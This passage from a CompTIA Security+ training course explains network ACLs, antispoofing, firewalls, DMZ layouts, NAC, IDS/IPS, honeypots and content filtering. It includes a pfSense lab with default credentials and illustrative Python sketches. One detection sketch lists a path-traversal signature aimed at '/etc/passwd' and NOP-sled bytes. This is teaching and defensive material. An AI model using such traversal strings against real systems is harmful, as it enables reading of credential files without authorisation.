Note: Some of those are a little tricky: remember that TCP and UDP port 23 aren't exactly the same.
Likewise, even if something would be implicitly denied anyway, it can be explicitly denied before
getting that far.
In real networks, ACLs can get large and complex, and have to be optimized not only for functionality but for
performance. They're not just used for security, either, but rather to shape how traffic flows through the
network.
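The first-match logic itself fits in a few lines of code. This Python sketch is not how any real router implements its ACLs; it simply mirrors the evaluation order described above, including the implicit deny, using the same example rules.

# Minimal sketch of first-match ACL evaluation with an implicit deny at the end.
import ipaddress

RULES = [
    # (source network, protocol, destination port, action); None means "any"
    (None, "TCP", 23, "DENY"),                                      # Rule 1: deny Telnet
    (ipaddress.ip_network("10.10.0.0/16"), None, None, "ALLOW"),    # Rule 2: allow the subnet
]

def evaluate(src, proto, dport):
    src = ipaddress.ip_address(src)
    for number, (net, r_proto, r_port, action) in enumerate(RULES, start=1):
        if net is not None and src not in net:
            continue
        if r_proto is not None and r_proto != proto:
            continue
        if r_port is not None and r_port != dport:
            continue
        return "%s (Rule %d)" % (action, number)    # first matching rule wins
    return "DENY (Implicit)"                        # nothing matched

print(evaluate("10.10.92.138", "TCP", 23))      # DENY (Rule 1)
print(evaluate("10.10.33.127", "UDP", 23))      # ALLOW (Rule 2): Rule 1 only covers TCP
print(evaluate("192.168.100.120", "TCP", 80))   # DENY (Implicit)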

Using ACLs for antispoofing


Even on a router that isn't primarily intended as a security device, ACLs can be a valuable security tool. One
of the most common is configuring rules that block packets with spoofed IP addresses, since those are a
common element of DDoS and other network attacks. A set of antispoofing ACLs might block packets with
the following source characteristics:

Exam Objective: CompTIA SY0-501 2.1.4, 3.2.4.10

 Martian packets with source addresses that would never be found on a valid packet
• Multicast addresses
• Loopback addresses
• Non-routable reserved or link-local addresses
 Packets with valid source addresses, but arriving on invalid interfaces
• Local addresses arriving from internet-facing ports
• Public addresses within the organization arriving from internet-facing ports
• Addresses from internal subnets arriving from ports that cannot reach that subnet
Note: Reverse path forwarding (RPF) functions on modern routers allow them to verify that a
valid path exists to a given IP address from a given port.
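As a loose illustration of the "martian" category above, plus internal ranges that shouldn't arrive from outside (a classification sketch, not router configuration), Python's standard ipaddress module can flag source addresses an internet-facing antispoofing ACL would typically drop:

# Minimal sketch: addresses an edge antispoofing ACL would typically drop as sources.
import ipaddress

def drop_at_internet_edge(source_ip):
    ip = ipaddress.ip_address(source_ip)
    # Martians (multicast, loopback, link-local, reserved) plus private/internal
    # ranges that shouldn't appear as sources on an internet-facing port.
    return (ip.is_multicast or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_private)

for addr in ["224.0.0.5", "127.0.0.1", "169.254.10.20", "10.0.0.8", "8.8.8.8"]:
    print(addr, "-> drop:", drop_at_internet_edge(addr))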


Switch security features


Network ACLs are most commonly associated with routers, since they require a certain level of network
awareness and processing power on the part of the device that uses them. Despite this, switches and access
points have important traffic direction functions, and as they've become increasingly sophisticated they've
added features similar to router ACLs that can be used to filter traffic for security and performance reasons.

Exam Objective: CompTIA SY0-501 2.1.5, 2.1.13

Port security A switch feature that tracks device MAC addresses connected to each port on a switch,
and allows or denies traffic based on source MAC addresses. This can be used to block
unfamiliar addresses in order to keep rogue devices off the network, or to block inside
attacks based on MAC spoofing. It can also prevent multiple MAC addresses from
connecting to a single physical port, such as if a user attached an unauthorized hub or
switch to a network drop. It's possible for an unauthorized device to spoof the MAC
address of a legitimate one, so it's not strong security in itself, but it's still a useful
security layer.
MAC filtering On Ethernet networks this is another term for port security, but it's more commonly used
for a similar feature on WAPs. It's still useful, but much easier to circumvent because a
WAP transceiver only has one "port" and it's easier for an attacker to watch for legitimate
MAC addresses to imitate.
Loop protection Traditional switches are limited in traffic direction abilities, so any physical loop in a
Layer 2 network can cause a switching loop that causes traffic, especially broadcast
traffic, to circulate uselessly until it shuts down the whole network. Many switches use
switching protocols designed to specifically detect and disable redundant connections to
prevent switching loops. While maliciously introduced loops aren't a common network
attack, loop protection helps increase network availability by preventing accidental loops,
and allows you to create redundant physical connections to increase availability in case
one fails.
Flood guard More sophisticated switches that can examine packets on Layer 3 or higher can protect
against additional network attacks. In addition to anti-spoofing ACLs, a popular feature is
prevention against SYN floods and similar attacks. A switch with its flood guard enabled
enforces a rate limit on communications which shouldn't be a constant part of network
traffic, such as excessive SYN packets from a single IP address.


Discussion: Network ACLs


1. How is an ACL based on implicit deny different from a whitelist?
A whitelist wouldn't contain any explicit denials, but an ACL based on implicit deny might need to use
explicit deny to create exceptions in what it allows.
2. Why is the order for an ACL important for performance?
Every time the device examines traffic it goes through the ACL until it finds a rule that applies, then
stops. This takes processing time, so if the rules applying to the most common traffic are near the end of a
long list, performance will be lower than if they're near the beginning.
3. Your router's antispoofing ACL blocked a large volume of traffic from the internet. The packets were all
destined to different internal addresses, but all had a forged source address corresponding to the same
internal server. What might have been the goal of the attacker?
Most likely it was intended as a reflected DoS attack. If the destination computers had received the
packets, they would have all responded to that server.

About firewalls
Simply put, any network element that uses pre-configured security rules to control network traffic is a firewall,
but that's a pretty broad category, and can be split up a number of ways. One of the most fundamental is in
what it protects.

Exam Objective: CompTIA SY0-501 2.1.1.2, 2.3.7.1, 2.4.4, 3.2.4.6

 A host-based firewall is software running on a single host, and protects just that host. In network terms
it's not usually separated from the host itself.
 A network-based firewall protects networks. Like a router (because usually it is a router), it might be a
specialized hardware device, or just a general purpose computer with multiple NICs and the right
software installed. Network-based firewalls are themselves divided into two categories depending on
their status in the logical network.

• A routed firewall is a logical node with an IP address, which segments the network like a normal
router. It can perform other routing functions, serve as a VPN endpoint, and so on. Traffic passing
through a routed firewall sees it as one routing hop.
• A virtual wire firewall is a physical node without an IP address, which can't perform any routing or
switching functions. It's also called a transparent firewall since allowed traffic passes through
without any routing hops or obvious changes. A transparent firewall doesn't segment the L2 network

or block multicast/broadcast traffic, which can be useful in some configurations. On the other hand,
since it's logically a L2 device it can't perform all the functions a routed firewall can.

Both kinds of firewalls function similarly in the software sense, which is to say they evaluate traffic according
to the same kinds of rules. In particular, they help to protect hosts on the network from worm infections,
attacks against vulnerable services, network probes, and other sorts of malicious traffic. Both types have their
individual benefits too.
 Host-based firewalls protect systems regardless of network conditions, and can also prevent unwanted
outbound traffic from Trojan horses or other unauthorized programs, even within the internal network.
 Network-based firewalls can be centrally configured, and can easily block access to certain services
from outside the network without disrupting their internal use.

Fortunately, you don't have to choose between the two: a network can have multiple firewalls, and in fact a
mixture of host-based and network-based firewalls has become the norm even in home and small office
environments. It's easy, since modern operating systems come with built-in firewall software, as do consumer
grade routers and access points. This is great, since firewalls are essential to network security: for instance,
before Service Pack 2 and its integrated firewall were released, vulnerabilities in Windows XP meant a system
could be infected by malware within moments just by connecting to the Internet. Larger and more secure
networks can use larger or more secure firewalls, such as third-party security software, servers configured as
firewalls, or high-performance enterprise-level hardware firewalls.

Filtering types
The first firewalls were just packet filters: routers with ACL-based filtering rules for what traffic they'd permit
through an interface. This kind of firewall makes its decisions based on the L3 header of each packet, and
maybe just a glimpse into the L4 header to see port numbers. It's called stateless filtering because every
packet is treated in isolation and put through the same filtering rules: the firewall doesn't know, or care,
whether a given packet is the start of a conversation, a reply, or the millionth in a lengthy session. Static
packet filtering is still used: it's easy to configure, quick to process, and works pretty well for a lot of traffic.
On the other hand, stateless filters can be confused by some kinds of conversations, and they're vulnerable to spoofing attacks.

Exam Objective: CompTIA SY0-501 2.1.1.3


To solve these problems, the next generation of firewalls introduced stateful filtering, or stateful packet
inspection (SPI). A stateful firewall inspects source and destination headers, and possibly other TCP or UDP
data, in order to determine whether the current packet represents a new communication session, or a
continuation of an existing one. This also means a stateful firewall has to keep track of ongoing conversations
in a state table, terminate them when a host does, and time them out after they've been idle a while.
The SPI process takes more memory and more work than stateless filtering, but it adds a lot of flexibility. One
big benefit is that different rules can apply for continuing an existing session vs. starting a new one. It's
sometimes called dynamic packet filtering, since the firewall can modify rules based on what it knows about
the ongoing conversation. One of the most common uses is to block unsolicited inbound traffic, but let outside
hosts respond to connections initiated from the inside.
For a simple example, imagine that a firewall allows inside users to visit websites, so outbound connections to
TCP port 80 have to be allowed. For web servers to respond, the firewall has to allow inbound traffic from
port 80. A stateless firewall could be fooled by a packet using a spoofed source port: it claims to be a
responding website, but is actually something else entirely. A stateful firewall is smarter: it allows only
inbound traffic that's initiated from the inside.


1. The internal host A initiates a connection to web server B, starting a usual TCP handshake. It uses TCP
port 80 as its destination, and one of its own ephemeral ports (55555) as the source.
2. The firewall determines this is legitimate outbound traffic and records the combination of source and destination addresses and ports as a new entry in its state table.
3. Web server B sends its reply to the internal host: it's addressed to TCP port 55555, and from TCP port 80.
4. The firewall reads the remote address and port, and the local address and port. Seeing that they all match
the recorded session in its state table, it allows the traffic.
5. Once the handshake is complete, the conversation can continue: when either side closes the session, or
when enough time passes without traffic, the firewall removes the entry from its state table.
In contrast, imagine that attacker C sends a few spoofed packets: they say they're from port 80, but they're
actually a buffer overflow attack against a vulnerable port. A stateless firewall might be fooled and let it
through. Tricking the stateful firewall is much harder: C would have to guess, and spoof, internal and external
ports and addresses currently in the state table.
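
To make the state-table logic concrete, here's a minimal Python sketch of stateful filtering. It's a hypothetical simplification (the addresses, ports, and Packet structure are invented for illustration, and real firewalls also track TCP flags, sequence numbers, and idle timeouts), not a working firewall.

    from collections import namedtuple

    # Hypothetical, greatly simplified model of stateful packet inspection.
    Packet = namedtuple("Packet", "src_ip src_port dst_ip dst_port direction")
    state_table = set()   # (local_ip, local_port, remote_ip, remote_port) entries

    def filter_packet(pkt):
        if pkt.direction == "outbound":
            # Allowed outbound traffic creates a state entry so replies can return.
            state_table.add((pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port))
            return "allow"
        # Inbound traffic is allowed only if it matches a recorded session.
        session = (pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port)
        return "allow" if session in state_table else "block"

    # Host A opens a connection to web server B, so B's reply is allowed...
    print(filter_packet(Packet("10.10.10.5", 55555, "203.0.113.8", 80, "outbound")))  # allow
    print(filter_packet(Packet("203.0.113.8", 80, "10.10.10.5", 55555, "inbound")))   # allow
    # ...but a spoofed packet "from port 80" with no matching session is blocked.
    print(filter_packet(Packet("198.51.100.9", 80, "10.10.10.5", 3389, "inbound")))   # block
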
SPI doesn't solve every problem. There are still protocols that confuse it, and even if it tracks sessions it has
no way of knowing what type of traffic it's handling, just the ports it's using. The next step up is application
layer firewalls. While they can require a lot more processing power, application layer firewalls can use deep
packet inspection (DPI) to find irregularities SPI can miss or to enforce rules that would be difficult or
impossible to create on lower levels. In the previous example, DPI wouldn't just notice C's attack isn't part of
an existing session: it could also recognize the non-standard and harmful nature of the packets. DPI could also
be used to recognize services on non-standard ports: for example, if the network disallowed SSH traffic, DPI
could be used to prevent SSH connections over HTTP ports. These firewalls are often called context-aware or application-aware, because they monitor not only traffic and sessions, but also the context the information is transmitted in and the applications being used.
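
As a rough illustration of the SSH-over-HTTP example above, DPI looks past the port number at the payload itself. The check below is a hypothetical sketch that only inspects the first bytes of a session; real DPI engines use full protocol decoders.

    # Hypothetical DPI check: is traffic on TCP port 80 actually HTTP?
    # SSH sessions start with an identification string such as "SSH-2.0-...",
    # while HTTP requests start with a method like GET, POST, or HEAD.
    HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ")

    def inspect_port80_payload(first_bytes):
        if first_bytes.startswith(b"SSH-"):
            return "block: SSH tunneled over an HTTP port"
        if first_bytes.startswith(HTTP_METHODS):
            return "allow: looks like HTTP"
        return "flag for review: unrecognized protocol on port 80"

    print(inspect_port80_payload(b"GET /index.html HTTP/1.1\r\n"))
    print(inspect_port80_payload(b"SSH-2.0-OpenSSH_8.9\r\n"))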

DMZ topology
One way to look at a firewall is as a boundary between two different security zones of a network, regulating
what passes between them. If you're lucky, you'll get to administer a network where all of your hosts are in the
same "inside" intranet, the whole rest of the Internet is the "outside" zone, and you can just make sure as little
traffic as possible comes from the outside in. Not everyone's so lucky. It's especially difficult when the
network hosts services available to outside users, like web or email servers. Just opening those servers to
untrusted connections also opens them to attack; worse, even if outside traffic can be limited to those specific
servers, if they're compromised it can give an attacker inside access to the whole rest of the network.

Exam Objective: CompTIA SY0-501 3.2.1.1, 3.2.1.2, 3.2.1.3


A common way to solve the problem is to put any outside-facing services in a demilitarized zone (DMZ).
Don't take the terminology too literally, it's just a more colorful way of saying perimeter network. The DMZ
adds a third zone to network security: under the organization's direct control, but separate from, and less
trusted than, the internal network. That isn't to say the DMZ won't be protected too, just that traffic can't pass
freely from the DMZ to the internal network.

Note: Closely related to the DMZ is the extranet, a network zone that is designed for access by trusted
business partners or others who need access to hosted data or services, but who shouldn't get access to
the entire private network. An extranet serves a similar security role to a DMZ, it's just commonly
accessed through a VPN or other WAN connection rather than being quite so open to the internet.
There are a few topologies you can use for a DMZ. The easiest is to just place all the DMZ hosts outside the
firewall. This leaves them extremely vulnerable to attack, so in this configuration all DMZ hosts should be
configured as bastion hosts, hardened and secured as best as you possibly can against attackers, with all
unnecessary services disabled to minimize their attack surface. In this configuration, communication between
internal hosts and bastion hosts must be as tightly regulated as that between internal hosts and the internet.

Note: One of the simplest examples of a bastion host is a dual-homed server with two NICs, configured
as a firewall to bridge the inside and outside networks. Other outside-facing services can run on the
firewall, but you'll need to be very careful hardening it. Likewise, gateway routers and firewalls
themselves can often be considered bastion hosts.

A more secure alternative is a three-homed firewall (or multihomed firewall) connecting the three zones (inside, outside, and DMZ). Traffic passing between any two zones is protected by the firewall, so not only is
the inside protected from both the outside and DMZ, the DMZ is protected from outside. You can even apply
different rules to each particular route, so that ports open in the DMZ are closed on the inside network.


One of the most secure configurations is a dual firewall. Like the name suggests, it uses two firewalls: a
perimeter firewall that protects the DMZ from the outside, and an interior firewall that protects the inside
from the DMZ. This is an example of defense in depth: even if the perimeter firewall is compromised there's
still another layer of protection. This is more expensive and complicated, so isn't as common on small
networks.

CAUTION: SOHO routers with integrated firewalls often let you designate a specific IP address as a
"DMZ host." This option opens all ports to that host at once, which is useful for some purposes like
troubleshooting or connecting certain game consoles. Never confuse this with an actual DMZ, or even a
bastion host. Unlike a member of a real DMZ, the DMZ host is still able to communicate directly with
the internal network, compromising overall security.

Network Access Control


It's easy to consider firewalls and DMZs as a separate security dimension from authentication systems, since
they do very different things. It's especially easy on a traditional wired network: internal systems can be
trusted because they're under the physical control of network administrators who can make sure they're not
easily compromised. Wireless or remote access networks throw a wrench in the idea: where exactly does a
newly connected client fit in the security zone structure? Even a trusted user might still log in with a
compromised system. For this reason, security zones sometimes have to be implemented even on
authenticated networks. This combination of AAA systems with network segmentation and host-level security
is sometimes called Network Access Control (NAC) or client control.

Exam Objective: CompTIA SY0-501 2.1.11, 3.2.1.5, 6.3.3.3


Many WAPs have a guest network feature. It creates a separate access point with its own SSID and login
credentials. Logging into it is similar to joining a DMZ: guest clients are on a separate network from internal
clients, and can't communicate to them directly. They can only use the WAP for Internet access. This is a
useful way to allow guests Internet access even if you don't trust that their devices, or even the users
themselves, would be safe on the private network. Especially in commercial environments the connection
might be to a captive portal webpage which asks for a username and password, email address, or even just
accepting an acceptable use policy. Until they satisfy the portal's requirements, users can't access any other network resources at all.
For remote access via PPP or VPN this approach wouldn't work: the remote users probably have Internet
access already, so the whole point is for them to access internal network services they can't reach from outside the
firewall. Some authentication systems not only verify identity, but perform a posture assessment that makes
sure the client system meets certain security rules; for example, that it has appropriate antivirus software
installed, and that its operating system and relevant software is updated with the latest security updates. If the
client isn't up to date, it's instead connected to a quarantine network; it can't access sensitive network
resources, but instead is directed to download security updates and whatever else it needs.
Posture assessments can be used on any network requiring authentication, but since they can require a lot of
information about the client system they're more complicated than entering user credentials. For this reason
they often require clients to run an application, or agent, which performs the necessary checks locally.
• Permanent or persistent agents run automatically at operating system startup.
• Dissolvable agents run only during the login process.
• Agentless configurations might rely on less intrusive posture assessments, but some use Active Directory features or integrate with other security software to perform the functions an agent normally would.
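
As a concrete (and entirely hypothetical) illustration of the agent checks described above, a posture assessment and the resulting NAC decision might boil down to something like the sketch below; the specific checks, thresholds, and function names are invented for this example.

    # Hypothetical posture-assessment checks a NAC agent might run locally.
    # Real agents query patch status and security products in vendor-specific ways.
    def assess_posture(av_running, days_since_last_patch):
        failures = []
        if not av_running:
            failures.append("antivirus not running")
        if days_since_last_patch > 30:
            failures.append("OS updates out of date")
        if failures:
            # Failing clients go to the quarantine network to remediate.
            return "quarantine: " + ", ".join(failures)
        return "grant access to the production network"

    print(assess_posture(av_running=True, days_since_last_patch=3))
    print(assess_posture(av_running=False, days_since_last_patch=45))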

Network management interfaces


Firewalls need to be configured and managed. So do routers and modern switches with advanced features. In
fact, almost any network appliance you can use today has a lot of settings and features you need to access. If
you're just configuring a computer to act as a firewall it might have a keyboard and monitor connected
already, but otherwise you have two main choices.
If a device is already connected to the network, you can access it through that same network. This is called in-
band management, and is convenient since you can check on the appliance from anywhere on the network.
Appliances marketed to the SOHO market, like home routers, tend to have simple web-based interfaces.
Enterprise devices might also support SSH terminal access, or network management protocols like SNMP so
that you can centrally manage all your network devices.
Some devices let you access them through a separate interface not connected to the network, in what is called
out of band management (OOB). Depending on the device this could be a serial interface for a management
terminal, or it could be a separate network interface to a management network that doesn't interact with the
main business network. If you're using an old computer as a firewall, its out of band interface is that keyboard
and monitor still attached to it. OOB interfaces have the benefit that they can be accessed even if the network
is down or congested, and might even be usable to cycle power to an otherwise unresponsive device.
A network device might have either or both interface types, but you need to secure them. In-band interfaces
should use secure protocols such as HTTPS, SSH, or SNMPv3, and be protected by strong passwords or other
credentials. Out-of-band interfaces are safe from attacks through the regular network, but they still must be
physically secured against intrusion, especially if part of a separate management network.


Discussion: Firewalls
1. Why would you still want a firewall at the edge of your subnet, when every PC on it has a firewall
application already?
Apart from the added security benefits of an extra layer of defense, you might want to open ports for
applications you use within the network, while blocking those services from outside traffic.
2. What types of traffic can still fool stateful firewalls?
Examples include packets with hazardous contents, or normal protocols running on non-standard ports.
3. Why shouldn't you use a home router's DMZ setting to set up an actual DMZ?
It's really not the same thing at all. The home router version just removes firewall protection from one
host, rather than creating an actual perimeter network.
4. What is the firewall configuration on your home or office network?
Answers may vary.

Exercise: Configuring a firewall


In this exercise, you'll configure the network firewall built into the pfSense VM. pfSense serves as a router
between your two Windows VMs and the internet.
Do This How & Why

1. Log into the pfSense router from the Windows 7 VM. You could configure the router from its text interface, but it's easier to use its remote web interface.

a) In Firefox, browse to 10.10.10.1. You're asked for a username and password.

b) Log in with username admin and password pfsense.

2. View firewall settings.

a) From the top menu, click Firewall > Rules. The Firewall: Rules page opens. By default, the rules for the WAN interface are selected.

b) Examine the WAN rules. The firewall is configured to block (silently drop) all bogon traffic from illegitimate IP addresses not assigned by the IANA, which is normal for firewalls. It's also configured to reject all unsolicited inbound traffic, meaning that it's blocked but sends an ICMP reject message.

c) Next to the Block All In rule, click the Edit button. The Edit page opens for the rule.


d) In the Action section, choose Block. Since Block doesn't send any error messages to an attacker, it's generally more secure than Reject.

e) Scroll to the bottom of the page and click Save. You return to the Rules page. You need to apply your changes for them to take effect, but you have other rules to set first.

3. Edit LAN rules. The router has three interfaces. The WAN port points toward
the internet, the LAN port toward the 10.10.10.0 subnet with
the Windows machines, and the LAN2 port toward the
currently unused 10.10.20.0 subnet.

a) Click LAN.
The LAN currently allows all outbound traffic going to other networks. This isn't unusual either.

b) Modify the last rule. Click the Edit button. The Edit page opens for the rule.

c) From the Protocol list, choose TCP. You'll make this a rule to specifically allow outbound HTTP
traffic, which is TCP.

d) In the first list in the Destination port range section, choose HTTP (80).

e) Click Save. To return to the LAN rules.

4. Create a new LAN rule. You'll create a matching rule to allow HTTPS traffic.

a) Below the existing rules, click the Add button. Firewalls process rules in order, and you want to put this one after the existing ones. The Edit page opens again.

b) In the Source section, choose LAN net from the Type list.

c) In the Destination section, choose WAN net from the Type list. It's a rule for outbound traffic.

d) In the Destination port range section, choose HTTPS (443) from the first list.

e) Scroll down and click Save.

5. At the top of the Firewall: Rules page, click Apply Changes. To commit the changes and configure the firewall.

6. Close Firefox.


Intrusion detection and prevention


Closely related to firewalls, but not entirely synonymous, are intrusion detection systems and intrusion
prevention systems (IDS and IPS). Both are designed to monitor network traffic and other events, and look for anything suspicious that might be indicative of an attack. When suspicious
behavior is spotted, the system takes some kind of action, even if it's just recording the incident for later
review. There are a lot of ways to recognize attacks, but they fall into three general categories. Any given
system might use one or more of them.

Exam Objective: CompTIA SY0-501 2.1.3.1, 2.1.3.2, 2.1.3.3, 2.1.3.6, 2.1.3.7

Signature-based: Methods that look for behavior characteristic of known attacks. For example, the particular malformed packet used by a known worm might be on the list of suspicious signatures, as might a telnet attempt into the root account. Signature-based methods are great at stopping many known attacks, but they'll miss anything that's not on the list.

Stateful protocol analysis: Methods that use SPI or DPI to analyze traffic by examining the protocol it uses, and comparing to a profile of how that protocol is supposed to work. A single SYN packet isn't suspicious, but a sudden rush of them suggests a flood attack. Incoming packets that look like HTTP sessions at the network layer but are an entirely different protocol at the application layer would also be suspicious. Stateful protocol analysis can detect many attacks signature-based methods won't, but it's still only as good as the profiles. This is especially difficult with proprietary protocols that don't have full documentation available to the public.

Anomaly-based (or heuristic): Methods that look for behavior that looks unusual, at least relative to a normal baseline of past or expected behavior. Even if it doesn't directly match any signatures or misuse protocols, a traffic spike from a DDoS attack is an anomaly. So is a new kind of traffic not usually seen on the network, or a local user logging in from a foreign IP address. Heuristic detection is very difficult to design, and takes a lot of data gathering to be accurate, but of the three it's the most able to catch dangerous zero-day attacks against vulnerabilities no one even knew existed.
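
The contrast between signature-based and anomaly-based detection can be sketched in a few lines of Python. The byte patterns and the traffic baseline below are invented placeholders; production systems rely on large, regularly updated rule sets and statistical models.

    # Hypothetical detection sketch contrasting two of the methods above.
    SIGNATURES = [b"../../etc/passwd", b"\x90\x90\x90\x90"]   # placeholder patterns

    def signature_match(payload):
        # Flags traffic containing any known-bad pattern; misses anything not listed.
        return any(sig in payload for sig in SIGNATURES)

    def traffic_anomaly(packets_per_second, baseline_pps):
        # Flags traffic far above the learned baseline, even with no matching signature.
        return packets_per_second > 10 * baseline_pps

    print(signature_match(b"GET /../../etc/passwd HTTP/1.1"))          # True: known pattern
    print(traffic_anomaly(packets_per_second=50000, baseline_pps=400)) # True: traffic spike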

Regardless of the method, whether any given type of traffic is classified as benign, suspicious, or unknown is
subject to change. Signatures and profiles can be updated, baselines are adjusted as the system gets more data,
and so on. Some elements of the process require administrator intervention or approval, while others might
happen automatically as the system learns more about its network.
Whenever the IDS (or IPS) evaluates a potential intrusion and makes a decision, there are four possible
results.

True positive An attack occurred, and the IDS recognized it. This is a good result: even if the attack itself
is bad, it was recognized and can be addressed.
True negative The event was benign, and triggered no alerts. This is a good result, since everything is
quietly working properly.
False positive The event was benign, but the IDS mistook it for an attack. This is bad: frequent false
alarms can disrupt network function, cost administrators time, or just make people less alert
when a real attack happens.
False negative An attack occurred, and the IDS mistook it for benign behavior. This is potentially
disastrous, since the network could be compromised without anyone knowing.


As you can tell, the positive/negative side is all the IDS sees: the true/false element is reliant on human
oversight and sometimes perfect hindsight. The goal of managing any sort of IDS, IPS, or firewall is to
choose a set of rules that minimize both false positives and false negatives, with the understanding that it's
always better to have a false positive than a false negative.

IDS vs IPS
It can be difficult to distinguish between intrusion detection and prevention, and for that matter how each
differs from firewalls. To some extent, products often do both and the difference is marketing, but not entirely.

Exam Objective: CompTIA SY0-501 2.1.3.4, 2.1.3.5, 2.4.1

• Intrusion detection systems are fundamentally passive monitoring systems designed to keep administrators aware of malicious activity: they can record detected intrusions in a database, and send alert notifications, but they rely on humans to actually take action. This has some advantages: false positives won't automatically interrupt benign activities without human oversight, and the evaluation process never has to delay traffic on a busy network or system.
• Intrusion prevention systems are active protection systems, also known as intrusion protection systems or active IDS. While they still might keep logs and trigger alerts, they're defined by how they can actively block traffic, disconnect users, lock accounts, or whatever else they're given permission to do when an attack is detected. An IPS can prevent damage from being done before a human can respond, but it can also harm network or system functions by acting on false positives. Since an IPS has to be able to intervene, it must be placed where it can block traffic or control system activities itself. An IPS can also have IDS capabilities: in that case it's called an IDPS.

Like firewalls, both can be located either on the network, or on a host. The two have some overlap, but focus
on different elements of security and can easily be used in tandem.
• Network-based systems (NIDS or NIPS) are placed on routers or other network choke points, and focus primarily on detecting network attacks, probes, or other suspicious traffic on the network level. They can protect entire subnets, and give the big picture of network activity. Like managed switches or other network appliances, they can use in-band or out-of-band interfaces for management and logging. They can also be divided depending on how they handle incoming traffic.

• Inline sensors examine traffic as it passes through and take action based on their findings, much like a firewall. Inline sensors can become a performance bottleneck, but only an inline IPS can prevent a harmful packet from reaching its destination.
• Passive sensors route a copy of incoming traffic to a monitoring port without interfering with its
passage. This allows higher network performance and lower latency, but a passive sensor can't block an
attack entirely. This doesn't impair the functions of a NIDS, but a passive NIPS is restricted to actions like
resetting TCP connections and other methods that don't require directly blocking traffic.

• Host-based systems (HIDS or HIPS) are placed on individual hosts and devices to protect them. They can monitor network traffic to and from their installed hosts, even data sent by encrypted protocols. They can also watch for suspicious user activities, changes to system files, or other signs of host-based attacks. Antivirus and antimalware programs with real-time monitoring are one example of HIPS.

It wouldn't be hard to look at all of this and say that a firewall is just an IPS focused on network traffic, and
you wouldn't be entirely wrong. The distinction gets even tougher when you consider higher level firewalls
with SPI or DPI rules meant to scout out suspicious traffic. Still, there are important distinctions. One is the
way rules are designed for each. A firewall is based on implicit deny, and has rules designed to specify the
kinds of traffic that should be allowed through. An IPS is based on implicit allow: its rules are designed to
specify types of traffic that should be blocked.
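
That difference in default posture is easy to show with a toy rule-evaluation sketch; the rule lists here are invented for illustration and don't reflect any particular product's syntax.

    # Hypothetical rule evaluation showing the two default postures.
    FIREWALL_RULES = [("tcp", 80, "allow"), ("tcp", 443, "allow")]   # what IS permitted
    IPS_RULES      = [("tcp", 23, "block"), ("udp", 1900, "block")]  # what IS forbidden

    def firewall_decision(proto, port):
        for rule_proto, rule_port, action in FIREWALL_RULES:
            if (rule_proto, rule_port) == (proto, port):
                return action
        return "deny"    # implicit deny: anything not explicitly allowed is dropped

    def ips_decision(proto, port):
        for rule_proto, rule_port, action in IPS_RULES:
            if (rule_proto, rule_port) == (proto, port):
                return action
        return "allow"   # implicit allow: anything not flagged as an attack passes

    print(firewall_decision("tcp", 3389))   # deny
    print(ips_decision("tcp", 3389))        # allow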


Honeypots and honeynets


Sometimes security isn't exactly intuitive. One example is a honeypot, a system designed to be attractive and
accessible to attackers. It might be completely open, or it might have an outwardly reasonable but flawed or
inadequate level of security. In actuality it's a decoy: the honeypot has no useful resources, and it's isolated
from the rest of the network (in a DMZ for example) so that compromising it won't even be useful for
mounting an inside attack. Instead, it's monitored to gather information on attackers without actually risking
the consequences of an attack on real systems. You can even deploy a whole network of honeypots, called a
honeynet.

Exam Objective: CompTIA SY0-501 2.2.10, 3.2.1.6


Honeypots and honeynets can be used for a variety of purposes. Security researchers use them to study the
methods and motives of attackers and develop countermeasures. Law enforcement agencies use them for sting
operations to catch hackers. Private organizations might use them to test security measures "in the wild" or to
provide tempting targets in hopes that attackers will go after the honeypot first and give advance notice of
plans against production systems. Likewise, a honeypot can be seen as either intrusion detection or intrusion
prevention: it's the former when you use it to detect the presence of active attackers before they reach the real
network, and it's the latter if it draws attackers to the useless honeypot instead of systems with resources of
actual value.
Honeypots can enhance network security by detecting threats and vulnerabilities, but they're not suited to
every network. Additionally, they pose ethical and legal concerns: before configuring systems to serve as bait
for hackers, make sure you're not violating any laws or policies by doing so.

Discussion: Threat detection methods


1. What IDS or IPS systems are in use on your network?
Answers may vary.
2. Why is heuristic analysis useful no matter how good your signature database is?
Good heuristic algorithms have a chance of noticing zero-day attacks that no signature system will.
3. How can a honeypot increase the security of your network?
Apart from the fact that an attacker might go after the honeypot first to give you advance warning, you
can examine how the attack worked to find potential vulnerabilities in your own network.
4. On an IDS or IPS system, what are the benefits of inline vs. passive placement?
Inline monitoring can hurt performance but allows harmful traffic to be blocked. Passive monitoring
allows higher performance and lower latency, but it can't block traffic directly.


Application layer and combined security


As security needs become more sophisticated, it's common for security devices or software to combine
multiple functions, and to scan traffic using more sophisticated, and thus usually higher level, methods.
Application layer firewalls and IDS/IPS are two examples of this, but there are a number of others in common
use today.

Exam Objective: CompTIA SY0-501 2.4.12


Application layer firewalls can also be more specialized, focusing on protecting particular applications and
services on the network. One example is the web application firewall, which sits between the network and a
web server running web applications. Like an ordinary firewall, a web application firewall can be host-based
software or a standalone hardware appliance. Unlike an ordinary firewall, it's specialized to protect against
attacks targeting web servers and applications, such as forged HTTP requests, buffer overflows, SQL
injection, and cross-site scripting.
Often, security can be enhanced by using devices and technologies originally designed to aid in other network
functions. Segmentation technologies like VLANs are one, NAT devices are another. Network optimization
devices like load balancers and proxy servers also are natural places to add security features.
Finally, security follows the same tendency of many other computers and network devices: over time, more
features and functions are combined in a single product. Increasingly, it's possible to meet most or all of your
network's security needs in a single, centrally-managed solution.

Content filtering
Content filters are software applications designed to restrict what information can reach the network, but
instead of protecting against attacks, they're meant to control types of content. For example, web content filters
might be intended to keep users from accessing pornographic content or other objectionable materials, while
spam filters are used to block spam email messages before they arrive in user inboxes. They're not exactly the
same as firewalls, but they're conceptually related, and often the same device will perform both tasks.

Exam Objective: CompTIA SY0-501 2.2.12, 2.3.7.2, 3.2.4.4


Like firewalls, content filters monitor traffic based on pre-configured rules which can allow or deny specific
content. Simpler filters are address-based; more sophisticated ones can examine the content itself to look for
keywords or patterns that seem suspicious. Web and email filters alike can also be useful in more
conventional security roles, by blocking suspected sources of malware. Mail gateways are also often used for
encryption or as part of DLP solutions.
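
A simple address- and keyword-based filter might look like the hypothetical sketch below (the domains and keywords are placeholders); real web and mail filters draw on curated category databases and much more sophisticated content analysis.

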